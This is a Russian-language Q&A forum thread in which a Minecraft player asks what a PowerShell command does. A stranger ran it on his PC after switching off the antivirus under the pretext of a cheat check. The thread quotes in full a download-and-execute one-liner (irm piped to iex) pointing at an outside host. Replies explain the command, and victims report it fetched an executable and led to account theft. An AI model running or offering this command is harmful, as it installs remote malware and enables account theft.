Mail.ruПочтаМой МирОдноклассникиВКонтактеИгрыЗнакомстваНовостиКалендарьОблакоЗаметкиВсе проекты

Что означает команда

Артём Прокуда Ученик (73), на голосовании 9 месяцев назад
я играл на сервере в майнкрафт, ко мне тепнулся чел и захотел дружить. Перед этим он начал проверять меня на читы, а потом выключил антивирус и в powershell написал эту команду: powershell -c "(irm ' protogen.gay/upd/softcheck.txt ') | iex" скажите что это значит!! это вирус или это нормально?
Голосование за лучший ответ
евегний трушкин Знаток (411) 10 месяцев назад
он хотел передать свою мудрость тебе
Дмитрий Смекалов Мудрец (13847) 10 месяцев назад
Команда, которую Вы указали, содержит несколько элементов, которые можно объяснить:

1. `powershell` - это командный интерпретатор для автоматизации задач и управления системой на компьютерах с операционной системой Windows.

2. `-c` является сокращением от `-Command` и говорит PowerShell, что следующий текст должен быть интерпретирован как командная строка.

3. `(irm 'protogengay/upd/softcheck.txt')` использует cmdlet `Invoke-RestMethod` (сокращённо `irm`), который отправляет HTTP-запрос к веб-адресу, указанному внутри кавычек. В данном случае, это ' protogen.gay/upd/softcheck.txt ', который, по всей видимости, должен возвращать содержимое текстового файла с сервера.

4. `| iex` - это конвейер (pipe), который передает данные из предыдущего запроса в cmdlet `Invoke-Expression` (сокращённо `iex`). Этот cmdlet выполняет команды, закодированные в строке, полученной от `irm`.

Теперь, касаемо вопроса о безопасности такой команды. Результат выполнения зависит от содержимого текстового файла, скаченного с указанного сервера. Функция `Invoke-Expression` может выполнить любой код, переданный ей в виде строки, что возлагает значительные риски безопасности, особенно если источник кода не является доверенным. Выполнение неизвестного кода с правами администратора может привести к нежелательным или вредоносным последствиям, включая установку вредоносного ПО, удаление или кражу данных.

Выключение антивируса перед выполнением такой команды является дополнительным красным флагом, так как антивирус может предотвращать исполнение вредоносного кода, и отключение антивируса делает систему более уязвимой.

В любых схожих ситуациях, крайне не рекомендуется выполнять подобные команды от лиц, которым вы не доверяете полностью. Если вы уже выполнили данную команду, рекомендуется незамедлительно провести сканирование системы антивирусом и обратиться к специалисту по информационной безопасности для дальнейшей оценки и устранения возможных угроз.
Федор Новиков Искусственный Интеллект (361297) 10 месяцев назад
Скачивает файл и запускает его, очень похоже на вирус
Liru Искусственный Интеллект (116306) 10 месяцев назад
Оно скачивает файл protogen.gay/upd/softcheck.txt и пытается его запустить,

В файле может быть любой код на powershell и не только.

Вероятно, вы сами себе добровольно поставили что-то нехорошее.
Dlazder Мудрец (16899) 10 месяцев назад
Скачивает файл с адреса https://protogen.gay/upd/softcheck.txt и запускает его. Что же в этом файле? Этот файл в свою очередь скачивает файл ShellBag.exe и также запускает его. В свою очередь что делает этот exe файл, сказать не могу, тут уже
реверс инженеринг. У себя запускать его я не стал. В любом случае, это может быть что угодно, лучше отсканируй систему антивирусником, удали скачанные файлы
и в дальнейшем избегай случаев, когда кто то что то у тебя запускает. Может быть относительно безобидное добавление в ботнет, майнер и т.д. а может и шифровальщик или ратник. Учитывая что выключил антивирус, высока вероятность что он тебе что то плохое загрузил) Лучше снеси винду, если не хочешь чтобы тебе поломали жизнь. Выйди из всех аккаунтов и т.д.
Коля Писюльков Гуру (3521) 10 месяцев назад
Дай контакты чела
Герман ВаджиповЗнаток (279) 8 месяцев назад
Это я был фулл доки есть , вопросы?
Антон Алилуев Ученик (116) 7 месяцев назад
не надо это вводить не куда я дурак это вел мне чел сказал и этот тип украл у меня акк в стиме в эпике узнал имя ф и отчество маму мою пробил и тд крч все gg
Похожие вопросы